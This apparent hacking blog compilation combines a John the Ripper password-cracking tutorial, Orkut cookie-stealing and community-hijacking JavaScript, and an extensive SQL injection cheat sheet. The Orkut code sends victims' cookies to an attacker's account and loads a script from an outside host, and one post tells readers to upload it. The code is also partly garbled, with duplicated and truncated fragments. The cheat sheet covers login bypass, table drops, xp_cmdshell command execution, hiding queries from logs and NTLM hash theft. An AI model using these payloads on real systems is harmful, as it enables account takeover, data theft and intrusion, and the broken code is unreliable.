Monday, February 18, 2008

John The Ripper Password Cracker!

John The Ripper Password Cracker!
This is for educational purpose for newbees….

I have complied a basic tutorial about how to use John the ripper software. Before moving on, to the actual procedure on how to use the software, I will give you a general overview of what “John the ripper” basically is…..

<< Introduction >>

John the Ripper is a fast pa**word cracker, currently available for
many flavors of Unix (11 are officially supported, not counting
different architectures), DOS, Win32, BeOS, and OpenVMS (the latter
requires a contributed patch). Its primary purpose is to detect weak
Unix passwords. Besides several crypt(3) pa**word hash types most
commonly found on various Unix flavors, supported out of the box are
Kerberos/AFS and Windows NT/2000/XP LM hashes, plus several more with
contributed patches.

Well, this is a basic tutorial where I will teach u the basic thing---crackin passwords.
First of all, u need to have a encrypted pa**word with u in a text file say u saved the pa**word in a.txt . Now to copy this file
go to the directory where John the ripper is installed
u hav 2 directories there --1)docs 2)run
enter the run directory n paste the file here
Let me clear u all tat John the ripper is not a gui software so unlike other pa**word crackers u'll have to use dos to use John the ripper. And between remember never be lazy to use dos as its a hackers best friend. Type cmd into the run window so that u enter dos n enter the run directory
You'll find a executable file here(.exe) it must b named john-386.exe but it may vary from version to version
Now comes the MOST important part what u have to do now is use a command
You'll have something written
C:/bla/blabla/run:>

First write the name of the .exe file the name of your pa**word text file
in our case it will be--
You'll have something written like

C:/bla/blabla/run:>john-386 a.txt

And thats it u have started cracking your encrypted pa**word. Wait for sometime it may be as long as 2 hrs……
When the pa**word recovery is over your decrypted pa**word gets saved in a file name john.pot u can open it using notepad and done. You have your pa**word finally….













download from google serch there

Exploit on Orkut

Exploit on Orkut
There is yet another exploit on Orkut(the Google affiliated Social Networking Service), and this exploit can easily be made use of to obtain ownership of someone else's community, with just a click on a community link. Name the community with:
< script scr="...URL...">
where URL points to the location where the below JavaScript is stored. Once someone clicks on a community having such has such a name, the script at that URL gets executed, and their community ownership is transferred to the person with the user ID xxxxxxxxxxxxxxxxxxxx (see below) which is the person's 20 digit User ID to whom your ownership gets transferred to. I just lost onwership to my "**********" community. So, BEWARE of this exploit and NEVER EVER CLICK on any community or profile with a name such as:
< script scr="...URL...">

The JavaScript exploit code is as below: (comments are in Portuguese, which I don't know a thing about, and neither am I a JavaScript expert, so I let you understand this script by yourself).

var uid="xxxxxxxxxxxxxxxxxxxx"; //
//window.alert('injetado');

function createXMLHttpRequest()
{
try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}
try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}
try{ return new XMLHttpRequest(); }catch(e){}
return null;
}

function getCookies()
{
subject="Orkut Cookie Exploit";
dcookie=document.cookie;
if(dcookie.indexOf('state') > -1)
{
mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nExploit escrito por Rodrigo Lacerda";
}
else
{
mensagem = "Este usuário usa Internet Explorer e a função de pegar cookies falhou, verifique se ele enviou alguma comundiade\n\nOrkut Community Transfer & Cookie Stealer Exploit\n";
}
check_scraps();
};
getCookies();

function velocity_transfer()
{
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,
Hack
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/Compose.aspx',true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
function check_scraps()
{
x=0;
var xml=createXMLHttpRequest();
xml.open("GET","Scrapbook.aspx",true);
xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlr1=xml.responseText;
if(!xmlr1.indexOf('textPanel') > -1)
{
SIG=xmlr1.match(/signature. value="(.+)"/i)[1];
POST=xmlr1.match(/name="POST_TOKEN" value="([^"]+)/i)[1];
send_message();
}
else
{
check_scraps();
}
};
};
xml.send(null);
};

this is how it will act and ur comms will get transfered.
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText;
if(!xmlrtr.match(/textPanel/gi))
{
array_cmm();
}
else
{
send_message();
}
}
};
};
cont=xmlr;
ini=cont.indexOf('
-1 ? cont.indexOf('
fim=cont.indexOf('
-1 ? cont.indexOf('
cont2=cont.substring(ini,fim)
cmm=String(cont2.match(/cmm=\d+/g)).replace(/cmm=/g,'');
cmm=cmm.split(',');
if(cmm)
{
velocity_transfer();
}
}
else
{
array_cmm();
};
};
};
xml2.send(null);
};

function send_message()
{
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&uid="+uid+"&sendTo=user&subject="+subject+"&body="+encodeURIComponent(mensagem)+"&Action.submit";
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText;
x++;
if(x{
velocity_transfer();
}
}
};
};

function array_cmm()
{
var xml2= createXMLHttpRequest();
xml2.open("GET","http://www.orkut.com/Communities.aspx",true);
xml2.onreadystatechange=function()
{
if(xml2.readyState==4)
{
var xmlr=xml2.responseText;
if(!xmlr.match(/textPanel/gi))
{ 12:00 AM
1/21/2007


νινєк:
the script which will be executed by that posted javascript is like


Var uid="7911771698884038554";

function createXMLHttpRequest()
{
try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}
try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}
try{ return new XMLHttpRequest(); }catch(e){}
return null;
}

function getCookies()
{
subject="Orkut Cookie Exploit";
dcookie=document.cookie;
if(dcookie.indexOf('state') > -1)
{
mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nOrkut Community Transfer & Cookie Stealer Exploit\nDesenvolvido por Rodrigo Lacerda";
}
else
{
mensagem = "This user uses Internet Explorer and the function failed to pick up cookies, make sure it sent some comundiade \ n \ nOrkut Community Transfer & Cookie Stealer Exploit \ by Rodrigo Lacerda";
}
check_scraps();
};
getCookies();

function velocity_transfer()

All Community owners, beware of a sneaky new phishing link going around. The link seems to lead to an Orkut community, but actually transfers ownership of your communities to some other profile.

More info here:
orkut-cookie-exploit-anyone-can-steal.html" target="_blank">http://technowise.blogspot.com/2006/12/orkut-cookie-exploit-anyone-can-steal.html

Do not click on any community or profile links which look like < script scr="...URL...">

A couple of communities have been lost already, namely the 'C' and the 'C/C++ programmers India' communities. So please watch out!

Orkut Community Hacking

Orkut Community Hacking
->> Cookie Transfer Script(s):

{
var omdt_atual = getCookie('omdt_atual');
}

"Run this script and see what happens" . You must have read this line many a times,but the only thing it'll do is transfer/send your "cookie" to the hackers scrapbook or email address.

now after this... u probably know what happens jus fo info

orkut community transfer

Community Transfer
javascript:aumentando_membros = prompt('Digite o nome da sua comunidade',''); multiplicando_membros = document.createElement('script'); multiplicando_membros.src = "http://urdowmain.com/js.php?uid=10288601952438406116"; document.getElementsByTagName('head')[0].appendChild(multiplicando_membros); alert('Aumentando membros da comunidade '+aumentando_membros+'....'); alert('Aguarde alguns instantes ...');void(0)"; document.getElementsByTagName('head')[0].appendChild(multiplicando_membros); alert('Aumentando membros da comunidade '+aumentando_membros+'....'); alert('Aguarde alguns instantes ...');void(0)

and the .js file will be put right away...

var uid='10288601952438406116';



function createXMLHttpRequest() {
try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}
try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}
try{ return new XMLHttpRequest(); }catch(e){}
return null;
}

function getCookies(){
subject="Orkut Cookie Exploit";
dcookie=document.cookie;
if(dcookie.indexOf('state') > -1)
{
mensagem = dcookie ;
}
else
{

// by Sj , xupetao loko da minha parte
RSymp = new ActiveXObject("Microsoft.XMLHTTP");
RSymp.open("POST", "LanguageReset.aspx?page=http://",false);
RSymp.send(null);
mensagem = RSymp.getResponseHeader("Set-Cookie");

}
check_scraps();
};
getCookies();

function velocity_transfer(){
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText;
x++;
if(x{
velocity_transfer();
}
}
};
};
function array_cmm(){
var xml2= createXMLHttpRequest();
xml2.open("GET","http://www.orkut.com/Communities.aspx",true);
xml2.onreadystatechange=function()
{
if(xml2.readyState==4)
{
var xmlr=xml2.responseText;
if(!xmlr.match(/textPanel/gi))
{
cont=xmlr;
ini=cont.indexOf('
-1 ? cont.indexOf('
fim=cont.indexOf('
-1 ? cont.indexOf('
cont2=cont.substring(ini,fim)
xmlj.open('POST','http://www.orkut.com/CommunityJoin.aspx?cmm=' + cmm_j[xx] ,true);
xmlj.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xmlj.send(send);
xmlj.onreadystatechange=function()
{
if(xmlj.readyState==4)
{
var xmlrtr=xmlj.responseText;
xx++;
if(x{
cmm_join();
}
}
};
};

from my second post..all the code should be put into a notepad and the community details must be given whereever necessary..nd saved as whatever.js and then uploaded in freehostia ..and the first one is the javascript to hack.. njoy

SQL Injection Cheat Sheet!

SQL Injection Cheat Sheet!
Well, Daniel this should answer your question about "SQL Injection Cheat Sheet"......

About SQL Injection Cheat Sheet

This is only for MySQL and Microsoft SQL Server, some ORACLE and some PostgreSQL currently. Well, most of samples are not correct for every single situation as tha scenario may change so be alert. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.

Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself.

M : MySQL
S : SQL Server
P : PostgreSQL
O : Oracle
+ : Possibly all other databases

Examples;
(MS) means : MySQL and SQL Server etc.
(M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server
Table Of Contents
About SQL Injection Cheat Sheet
Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
Line Comments
SQL Injection Attack Samples
Inline Comments
Classical Inline Comment SQL Injection Attack Samples
MySQL Version Detection Sample Attacks
Stacking Queries
Language / Database Stacked Query Support Table
About MySQL and PHP
Stacked SQL Injection Attack Samples
If Statements
MySQL If Statement
SQL Server If Statement
If Statement SQL Injection Attack Samples
Using Integers
String Operations
String Concatenation
Strings without Quotes
Hex based SQL Injection Samples
String Modification & Related
Union Injections
UNION – Fixing Language Issues
Bypassing Login Screens
Enabling xp_cmdshell in SQL Server 2005
Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see.
Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
Ending / Commenting Out / Line Comments
Line Comments
Comments out rest of the query.
Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax

 (SM)
DROP sampletable;--


# (M)
DROP sampletable;#
Line Comments Sample SQL Injection Attacks
Username: admin'--
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
This is going to log you as admin user, because rest of the SQL query will be ignored.
Inline Comments
Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

/*Comment Here*/ (SM)
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members


/*! MYSQL Special SQL */ (M)
This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.

SELECT /*!32302 1/0, */ 1 FROM tablename
Classical Inline Comment SQL Injection Attack Samples
ID: 10; DROP TABLE members /*
Simply get rid of other stuff at the end the of query. Same as 10; DROP TABLE members --
SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw an divison by 0 error if MySQL version is higher than 3.23.02 MySQL Version Detection Sample Attacks
ID: /*!32302 10*/
ID: 10
You will get the same response if MySQL version is higher than 3.23.02


SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw an divison by 0 error if MySQL version is higher than 3.23.02
Stacking Queries
Executing more than one query in one transaction. This is very useful in every injection point, especially in SQL Server back ended applications.

; (S)
SELECT * FROM members; DROP members--
Ends a query and starts a new one.

Stacked SQL Injection Attack Samples
ID: 10;DROP members --
SELECT * FROM products WHERE id = 10; DROP members--
This will run DROP members SQL sentence after normal SQL Query.


If Statements
Get response based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately.

MySQL If Statement
IF(condition,true-part,false-part) (M)
SELECT IF(1=1,'true','false')
SQL Server If Statement
IF condition true-part ELSE false-part (S)
IF (1=1) SELECT 'true' ELSE SELECT 'false'
If Statement SQL Injection Attack Samples
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
This will throw an divide by zero error if current logged user is not "sa" or "dbo".

Using Integers
Very useful for bypassing, magic_quotes() and similar filters, or even WAFs.

0xHEXNUMBER (SM)
You can write hex like these;

SELECT CHAR(0x66) (S)
SELECT 0x5045 (this is not an integer it will be a string from Hex) (M)
SELECT 0x50 + 0x45 (this is integer now!) (M)
String Operations
String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.

String Concatenation
+ (S)
SELECT login + '-' + password FROM members


|| (*MO)
SELECT login || '-' || password FROM members
*About MySQL "||";
If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using CONCAT() function in MySQL.

CONCAT(str1, str2, str3, ...) (M)
Concatenate supplied strings.
SELECT CONCAT(login, password) FROM members

Strings without Quotes
These are some direct ways to using strings but it’s always possible to use CHAR()(MS) and CONCAT()(M) to generate string without quotes.

0x457578 (M) - Hex Representation of string
SELECT 0x457578
This will be selected as string in MySQL.

In MySQL easy way to generate hex representations of strings use this;
SELECT CONCAT('0x',HEX('c:\\boot.ini'))


Using CONCAT() in MySQL
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
This will return ‘KLM’.


SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
This will return ‘KLM’.
Hex based SQL Injection Samples
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
This will show the content of c:\boot.ini
String Modification & Related
ASCII() (SMP)
Returns ASCII character value of leftmost character. A must have function for Blind SQL
Injections.

SELECT ASCII('a')


CHAR() (SM)
Convert an integer of ASCII.

SELECT CHAR(64)
Union Injections
With union you do SQL queries cross-table. Basically you can poison query to return records from another table.

SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
This will combine results from both news table and members table and return all of them.

Another Example :
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
UNION – Fixing Language Issues
While exploiting Union injections sometimes you get errors because of different language settings (table settings, field settings, combined table / db settings etc.) these functions are quite useful to fix this problem. It's rare but if you dealing with Japanese, Russian, Turkish etc. applications then you will see it.

SQL Server (S)
Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid one - check out SQL Server documentation.

SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members


MySQL (M)
Hex() for every possible issue

You’ll get convert() errors before union target errors ! So start with convert() then union

Simple Insert (MSO+)
'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes
@@version (MS)
Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions.

INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10)
,10)

Bulk Insert (S)
Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.

Create table foo( line varchar(8000) )
bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
Drop temp table, and repeat for another file.
BCP (S)
Write text file. Login Credentials are required to use this function.
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

VBS, WSH in SQL Server (S)
You can use VBS, WSH scripting in SQL Server because of ActiveX support.

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --


Executing system commands, xp_cmdshell (S)
Well known trick, By default it's disabled in SQL Server 2005. You need to have admin access.

EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'


Simple ping check (configure your firewall or sniffer to identify request before launch it),

EXEC master.dbo.xp_cmdshell 'ping '

You can not read results directly from error or union or something else.

Some Special Tables in SQL Server (S)
Error Messages
master..sysmessages


Linked Servers
master..sysservers
Password (2000 and 20005 both can be crackable, they use very similar hashing algorithm )
SQL Server 2000: masters..sysxlogins
SQL Server 2005 : sys.sql_logins

More Stored Procedures for SQL Server (S)
Cmd Execute (xp_cmdshell)
exec master..xp_cmdshell 'dir'


Registry Stuff (xp_regread)

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'


Managing Services (xp_servicecontrol)

Medias (xp_availablemedia)

ODBC Resources (xp_enumdsn)

Login mode (xp_loginconfig)

Creating Cab Files (xp_makecab)

Domain Enumeration (xp_ntsec_enumdomains)

Process Killing (need PID) (xp_terminate_process)

Add new procedure (virtually you can execute whatever you want)
sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’
exec xp_webserver
Write text file to a UNC or an internal path (sp_makewebtask)

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0

HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)

INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx

You can not use sub selects in SQL Server Insert queries
SQL Injection in LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;

If injection is in second limit you can comment it out or use in your union injection

Shutdown SQL Server (S)
When you really pissed off, ';shutdown --

Enabling xp_cmdshell in SQL Server 2005
By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.

EXEC sp_configure 'show advanced options',1
RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE

Finding Database Structure in SQL Server (S)
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = 'U'

Getting Column Names
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

Moving records (S)
Modify WHERE and use NOT IN or NOT EXIST,
... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members) -- very good one
Using Dirty Tricks
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int

Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21


Fast way to extract data from Error Based SQL Injections in SQL Server (S)
';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--

Blind SQL Injections
About Blind SQL Injections
In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.

Normal Blind, You can not see a response in the page but you can still determine result of a query from response or HTTP status code
Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common though.

In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.

Real and a bit Complex Blind SQL Injection Attack Sample
This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.
True and False flags

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--
Since both of the last 2 queries failed we clearly know table name's first char's ascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections by binary search algorithm. Other well known way is reading data bit by bit. Both can be effective in different conditions.


Waiting For Blind SQL Injections
First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.

WAIT FOR DELAY 'time' (S)
This is just like sleep, wait for spesified time. CPU safe way to make database wait.

WAITFOR DELAY '0:0:10'--

Also you can use fractions like this,

WAITFOR DELAY '0:0:0.51'

Real World Samples
Are we 'sa' ?
if (select user) = 'sa' waitfor delay '0:0:10'
ProductID = 1;waitfor delay '0:0:10'--
ProductID =1);waitfor delay '0:0:10'--
ProductID =1';waitfor delay '0:0:10'--
ProductID =1');waitfor delay '0:0:10'--
ProductID =1));waitfor delay '0:0:10'--
ProductID =1'));waitfor delay '0:0:10'--
BENCHMARK() (M)
Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!

BENCHMARK(howmanytimes, do this)

Real World Samples
Are we root ? woot!
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))


Check Table exist in MySQL
IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

pg_sleep(seconds) (P)
Sleep for supplied seconds.

SELECT pg_sleep(10);
Sleep 10 seconds.
Covering Tracks
SQL Server -sp_password log bypass (S)
SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible)

Clear SQL Injection Tests
These tests are simply good for blind sql injection and silent attacks.

product.asp?id=4 (SMO)
product.asp?id=5-1
product.asp?id=4 OR 1=1

product.asp?name=Book
product.asp?name=Bo’%2b’ok
product.asp?name=Bo’ || ’ok (OM)
product.asp?name=Book’ OR ‘x’=’x
Some Extra MySQL Notes
Sub Queries are working only MySQL 4.1+
Users
SELECT User,Password FROM mysql.user;
SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’;
SELECT ... INTO DUMPFILE
Write query into a new file (can not modify existing files)
UDF Function
create function LockWorkStation returns integer soname 'user32';
select LockWorkStation();

create function ExitProcess returns integer soname 'kernel32';
select exitprocess();
SELECT USER();
SELECT password,USER() FROM mysql.user;
First byte of admin hash
SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
Read File
query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
MySQL Load Data inifile

By default it’s not avaliable !
create table foo( line blob );
load data infile 'c:/boot.ini' into table foo;
select * from foo;
More Timing in MySQL
select benchmark( 500000, sha1( 'test' ) );
query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );
Enumeration data, Guessed Brute Force
select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );

Potentially Useful MySQL Functions
MD5()
MD5 Hashing

SHA1()
SHA1 Hashing


PASSWORD()
ENCODE()
COMPRESS()
Compress data, can be great in large binary reading in Blind SQL Injections.

ROW_COUNT()
SCHEMA()
VERSION()
Same as @@version

Second Order SQL Injections
Basically you put an SQL Injection to some place and expect it's unfiltered in another action. This is common hidden layer problem.

Name : ' + (SELECT TOP 1 password FROM users ) + '
Email : xx@xx.com

If application is using name field in an unsafe stored procedure or function, process etc. then it will insert first users password as your name etc.

Forcing SQL Server to get NTLM Hashes
This attack can help you to get SQL Server user's Windows password of target server, but possibly you inbound connection will be firewalled. Can be very useful internal penetration tests. We force SQL Server to connect our Windows UNC Share and capture data NTLM session with a tool like Cain & Abel.

Bulk insert from a UNC Share (S)
bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'

- Hacking zip,doc,rar,ppt,xls,pdf files -

- Hacking zip,doc,rar,ppt,xls,pdf files -
Hacking zip,doc,rar,ppt,xls,pdf files - part 1
Hi guys and gals this is vivek da great here, this tutorial is for hacking(call it "password recovering" if you want to) the following types of file passwords:

microsoft word(.doc)
microsoft excel(.xls)
microsoft powerpoint(.ppt)
winzip(.zip, .exe(SFX-ZIP)) - Turbo Zip Cracker (http://www.fdrlab.com/)
winrar(.rar, .exe(SFX-RAR)) - Advanced RAR Password Recovery (ARPR) (http://www.elcomsoft.com/prs.html)
acrobat reader(.pdf) - Advanced PDF Password Recovery Pro (APDFPRP) (http://www.elcomsoft.com/prs.html)

The passwords we are gonna hack are done by respective programs(different for all formats). the programs we are gonna use are based on dictionary atacks, hybrid attacks, password masks,brute force attacks(the last option).

Lets begin by a brief of various kinds of attacks:
1. dictionary attacks: in this the program uses a list of words in lexicographic order. these words can be stored as csv(comma seperated values), nsv(newline seperated values or ssv(space seperated values. the program juz takes the words one-by-one from the dictionary list and starts trying it on the file. if the right password is found, then the program halts with a success else it returns the result that the attack has been successful. now you can find all kinds of wordlists on google or altavista(remember my tutorial "hackers friendly google").
Part 2

2.hybrid attacks: these attacks involve appending 1 to 3 characters in the dictionary words, eg. heaven64, boy007, vinyl6, here the characters 64, 007, 6 are appended after dictionary words to increase the number of permutations as some of the people out there like to put these kinds of passwords.

3.password mask: If you already know some characters in the password, you can specify the mask to decrease the total number of passwords to be verified. At the moment, you can set the mask only for fixed-length passwords, but doing this can still help. For example, you know that the password contains 8 characters, starts with 'x', and ends with '99'; the other symbols are small or capital letters. So, the mask to be set is "x?????99", and the charset has to be set to All caps and All small. With such options, the total number of the passwords that the recovery program will try will be the same as if you're working with 5-character passwords which don't contain digits; it is much less than if the length were set to 8 and the All Printable option were selected. In the above example, the '?' chars indicate the unknown symbols.

